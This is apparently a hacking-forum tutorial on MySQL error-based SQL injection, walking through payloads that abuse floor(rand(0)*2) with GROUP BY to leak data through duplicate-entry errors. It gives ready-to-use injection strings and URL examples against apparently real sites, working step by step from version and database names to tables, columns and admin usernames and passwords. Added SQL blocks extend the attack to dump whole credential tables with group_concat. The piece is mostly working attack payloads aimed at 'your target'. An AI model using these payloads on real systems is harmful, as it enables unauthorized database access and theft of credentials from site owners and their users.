MySQL Error Based Injection Explained

 

We have already covered the basics of SQL injection with the UNION technique; you can read that post here: http://www.madleets.com/Thread-sql-injection-explained
If UNION does not work against your target, it is time to think outside the box.

In this article I cover Error Based Injection.

What is Error Based Injection?

In error based injection the attacker sends queries that force the database to throw errors, i.e. deliberately invalid or conflicting SQL statements are delivered to the database through HTTP requests. If the application echoes the raw database error message back in its response, we can shape the query so that the error message itself carries the data we want (a version string, a table name, a password) and read it straight off the page. The technique therefore depends on database errors being visible: if the application swallows them or shows a generic error page, the same payloads leak nothing.


When should we try Error Based injection?
There are several cases where the regular UNION technique fails and you need another way to exploit the vulnerability. For example, you use ORDER BY or GROUP BY to find the correct column count of the first SELECT statement, but when you UNION your second statement with it you still do not get the required output, and instead see errors such as

The used SELECT statements have a different number of columns
or
Unknown column '1' in 'order clause'
etc.
Another common case is that the injected SELECT succeeds but its result is never rendered anywhere on the page, while database error messages are.
In such scenarios, Error Based Injection is the way to go.



Exploitation using Error Based Injections.



  • We will be extracting MySQL Version Information.
  • We will be Extracting Database Names in our Target Application.
  • We will be Getting Table_Names in a particular Database.
  • We will be extracting Column_names of any table in any Database.
  • And We will be Extracting Entries from Columns then.


Extracting Version() with Error Based Injection

To extract version info, use the following query:
or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1#

How it works: MySQL evaluates the GROUP BY expression once to look up a row's group key in its temporary table and again when it inserts a group it did not find. With the fixed seed 0, floor(rand(0)*2) produces the sequence 0,1,1,0,1,1,..., so by the third row the key 'version:1' already exists and is inserted again, and MySQL aborts with a Duplicate entry error whose key value contains whatever we concatenated next to the random number. The 'or 1' is not filler: it makes the WHERE clause match every row, so the query has the three or more rows the collision needs. 0x3a is the hex for ':' and serves as a separator, and the # comments out whatever the application appends after the injection point.

Real time example:

http://website.com/search-res.php?id=70'+or+1+group+by+concat_ws(0x3a,version(),floor(rand(0)*2))+having+min(0)+or+1#

The page returns the error message

Duplicate entry '5.1.73-cll:1' for key 'group_key'

In this error message, 5.1.73-cll is our required data, the MySQL version string. Ignore the rest of the error.

NOTE: On my target the vulnerable parameter takes a string, so I put a single quote ' to end the string and # at the end to comment out the rest of the query.
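The following is an added example, not code from the original post, that reproduces the mechanism on a MySQL server you control so you can see why the payload errors and when it does not. The table name items and its rows are made up for the demonstration; the last query goes beyond the article and shows the form to use when the target's own table has too few rows.

```sql
-- Added example (not from the original post). Local reproduction of the
-- floor(rand(0)*2) GROUP BY trick. Table `items` and its rows are made up.
-- MySQL 5.7.5+ enables ONLY_FULL_GROUP_BY by default, which rejects the
-- `SELECT * ... GROUP BY <expression>` form with error 1055 before it runs;
-- clear the mode for this session so the payload behaves as on the 5.1
-- target in the article.
SET SESSION sql_mode = '';

CREATE TABLE items (id INT PRIMARY KEY, title VARCHAR(64));
INSERT INTO items VALUES (1, 'first'), (2, 'second'), (3, 'third');

-- The application's query after injecting
--   70' or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1#
-- into  SELECT * FROM items WHERE id='<input>'  (the # comments out the
-- closing quote the application appends). `or 1` makes WHERE match every row.
--
-- Why it fails: GROUP BY computes the key once to probe its temporary table
-- and again when inserting a group that was not found. With seed 0,
-- floor(rand(0)*2) yields 0,1,1,0,1,1,...:
--   row 1: probe 0 (miss), insert with 1  -> group '<version>:1' created
--   row 2: probe 1 (hit)                  -> counted
--   row 3: probe 0 (miss), insert with 1  -> '<version>:1' again -> ER_DUP_ENTRY (1062)
-- So the table must supply at least three rows.
SELECT * FROM items WHERE id = '70' OR 1
GROUP BY concat_ws(0x3a, version(), floor(rand(0) * 2))
HAVING min(0) OR 1;

-- Edge case: with only two rows the third evaluation never happens, the
-- query succeeds quietly and nothing is leaked.
DELETE FROM items WHERE id = 3;
SELECT * FROM items WHERE id = '70' OR 1
GROUP BY concat_ws(0x3a, version(), floor(rand(0) * 2))
HAVING min(0) OR 1;

-- Small-table workaround (beyond the article): take the rows from
-- information_schema.tables, which always has far more than three, and group
-- by an alias so the query is also legal under ONLY_FULL_GROUP_BY. This is
-- the classic "double query" form, injected into a numeric parameter as
--   ... and (select 1 from (<this query>) x)
SELECT count(*), concat_ws(0x3a, version(), floor(rand(0) * 2)) AS k
FROM information_schema.tables
GROUP BY k;
```

Run the script statement by statement in the mysql client: the first SELECT and the last one stop with error 1062 and the version string sits between the quotes of the Duplicate entry message, while the two-row SELECT in the middle returns a normal result set.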


Extracting Database() name with Error Based Injection



To extract the current database() name, use the following query:

or 1 group by concat_ws(0x3a,database(),floor(rand(0)*2)) having min(0) or 1#

Real time example:

http://website.com/search-res.php?id=70'+or+1+group+by+concat_ws(0x3a,database(),floor(rand(0)*2))+having+min(0)+or+1#

The error comes back in the same shape as before, Duplicate entry '<name>:1' for key 'group_key', and the text before the colon is the current database name.


How to find other database names, if any exist besides the current one?

Put a subquery against information_schema.schemata in place of database():

or 1 group by concat_ws(0x3a,(select concat(schema_name) from information_schema.schemata limit 1,1),floor(rand(0)*2)) having min(0) or 1#

The subquery must return exactly one row (a subquery that returns two or more rows raises "Subquery returns more than 1 row" instead of leaking data), so limit N,1 picks one schema at a time. Keep increasing the first number by 1 to get the next database name, and stop when the Duplicate entry error disappears, which means you have run past the last row. limit 0,1 is often information_schema itself, which is why the example starts at 1,1. Only the schemas the application's database user has privileges on are listed.

Real time example:

http://www.website.com/dir/committees.php?id=-40 or 1 group by concat_ws(0x3a,(select concat(schema_name) from information_schema.schemata limit 1,1),floor(rand(0)*2)) having min(0) or 1#


Finding Table names using Error based Injection

To extract the first table from the current database:

or 1 group by concat_ws(0x3a,(select concat(table_name) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2)) having min(0) or 1#

As with databases, increase the first number after limit by 1 for each further table.

NOTE: To extract table names from another database, replace database() with the quoted or hexed value of that database name. Hexing the name keeps quote characters out of the payload, which matters when the application escapes or strips them.

Real time example:

http://www.website.com/dir/committees.php?id=-40 or 1 group by concat_ws(0x3a,(select concat(table_name) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2)) having min(0) or 1#



Finding Column names using Error Based Injection

To find column names in any table, use this syntax.
Let's say our table_name is admin_user and we want to find the first column_name of table admin_user. Our syntax would be:

or 1 group by concat_ws(0x3a,(select concat(column_name) from information_schema.columns where table_name=0x61646d696e5f75736572 limit 0,1),floor(rand(0)*2)) having min(0) or 1#

Here 0x61646d696e5f75736572 is the hexed value of admin_user, and limit 0,1 means we are extracting the first column_name of this table. For the next column we simply increase the limit to 1,1:

or 1 group by concat_ws(0x3a,(select concat(column_name) from information_schema.columns where table_name=0x61646d696e5f75736572 limit 1,1),floor(rand(0)*2)) having min(0) or 1#

Note that this filters on table_name only. If a table with the same name exists in more than one database, information_schema.columns returns the columns of all of them, so add and table_schema=database() (or the hexed database name) to keep the list to the one table you mean.

Real time example:

http://website.com/dir/committees.php?id=-40 or 1 group by concat_ws(0x3a,(select concat(column_name) from information_schema.columns where table_name=0x61646d696e5f75736572 limit 3,1),floor(rand(0)*2)) having min(0) or 1#

You can see username:1 in the error; that is our required output, and username is the column name we were looking for.
I injected the website and found password at the 5th position in the table.
Anyway, we now have the table names and their column names.

How to Extract Entries from database using Error Based Injection?

Okay,
we know the table names and their column names. Now all we have to do is extract the entries of those columns from the tables.
We have columns username and password in table admin_user, so to extract their entries our syntax would be:

or 1 group by concat_ws(0x3a,(select concat(username,0x3a3a,password) from admin_user limit 0,1),floor(rand(0)*2)) having min(0) or 1#

0x3a3a is '::', the separator between username and password inside the extracted value. limit 0,1 again selects one row at a time; limit 1,1, limit 2,1 and so on walk the remaining rows.

Real time example:

http://www.website.com/dir/committees.php?id=-40 or 1 group by concat_ws(0x3a,(select concat(username,0x3a3a,password) from admin_user limit 0,1),floor(rand(0)*2)) having min(0) or 1#






You can see admin::admin123:1 in the result (the double colon is the 0x3a3a separator from the query, and the trailing :1 is the floor(rand(0)*2) value):
admin is the username and admin123 is the password.
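To tie the database, table, column and entry steps above together, here is an added example (not from the original post) that runs the whole information_schema walk against a made-up database shop holding a table admin_user, and adds one thing the article does not show: pulling many values per error with group_concat and paging the truncated result with mid(). The committees table and the id=-40 injection point mirror the article's URLs; every name and row below is constructed for the demonstration.

```sql
-- Added example (not from the original post). Database `shop`, tables
-- `committees` and `admin_user` and their rows are constructed for the demo.
SET SESSION sql_mode = '';   -- ONLY_FULL_GROUP_BY (default since 5.7.5) would reject these queries
CREATE DATABASE shop;
USE shop;
CREATE TABLE committees (id INT PRIMARY KEY, name VARCHAR(64));
INSERT INTO committees VALUES (40, 'finance'), (41, 'audit'), (42, 'ethics');
CREATE TABLE admin_user (id INT PRIMARY KEY, username VARCHAR(32), password VARCHAR(64));
INSERT INTO admin_user VALUES (1, 'admin', 'admin123'), (2, 'editor', 's3cr3t'), (3, 'guest', 'guest');

-- Injection point from the article:  committees.php?id=-40 or 1 group by ... #
-- i.e. the application runs  SELECT * FROM committees WHERE id=<input>

-- Step 1: databases, one per request. The subquery must return exactly one
-- row (two or more give "Subquery returns more than 1 row" instead of data),
-- hence LIMIT N,1. Raise N by one per request; when the Duplicate entry
-- error stops, N is past the last schema visible to the application's user.
SELECT * FROM committees WHERE id = -40 OR 1
GROUP BY concat_ws(0x3a,
  (SELECT schema_name FROM information_schema.schemata LIMIT 1,1),
  floor(rand(0) * 2))
HAVING min(0) OR 1;

-- Step 2: tables of a named database. 0x73686f70 is hex for 'shop', so the
-- payload needs no quote characters.
SELECT * FROM committees WHERE id = -40 OR 1
GROUP BY concat_ws(0x3a,
  (SELECT table_name FROM information_schema.tables
    WHERE table_schema = 0x73686f70 LIMIT 0,1),
  floor(rand(0) * 2))
HAVING min(0) OR 1;

-- Step 3: columns. Scope by table_schema as well as table_name
-- (0x61646d696e5f75736572 = 'admin_user'); a same-named table in another
-- database would otherwise mix its columns into the list.
SELECT * FROM committees WHERE id = -40 OR 1
GROUP BY concat_ws(0x3a,
  (SELECT column_name FROM information_schema.columns
    WHERE table_schema = 0x73686f70 AND table_name = 0x61646d696e5f75736572 LIMIT 1,1),
  floor(rand(0) * 2))
HAVING min(0) OR 1;

-- Step 4: entries. Instead of one row per request, group_concat packs every
-- row into a single key value (0x3a3a = '::' between the fields, 0x2c = ','
-- between rows). The Duplicate entry message truncates long key values
-- (commonly cited as about 64 characters for this technique), so page
-- through it with mid(): characters 1-60 here, 61-120 on the next request.
SELECT * FROM committees WHERE id = -40 OR 1
GROUP BY concat_ws(0x3a,
  (SELECT mid(group_concat(username, 0x3a3a, password SEPARATOR 0x2c), 1, 60)
     FROM admin_user),
  floor(rand(0) * 2))
HAVING min(0) OR 1;
```

Each SELECT is the query the application would execute after the corresponding payload is appended to id=-40; the value you are after is always the text before the final :1 in the Duplicate entry message. For the real target, URL-encode the payload and keep the trailing # so the rest of the application's query is commented out.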

I hope you now have an idea of how things work in Error Based Injection. Kindly give us your valuable feedback so that we can come back with more HQ articles.

Hi, this is Osama Mahmood and I will share all my knowledge and skills on #infosec with you; I hope you will enjoy learning new and unique things. Follow me on Twitter @OsamaMahmood007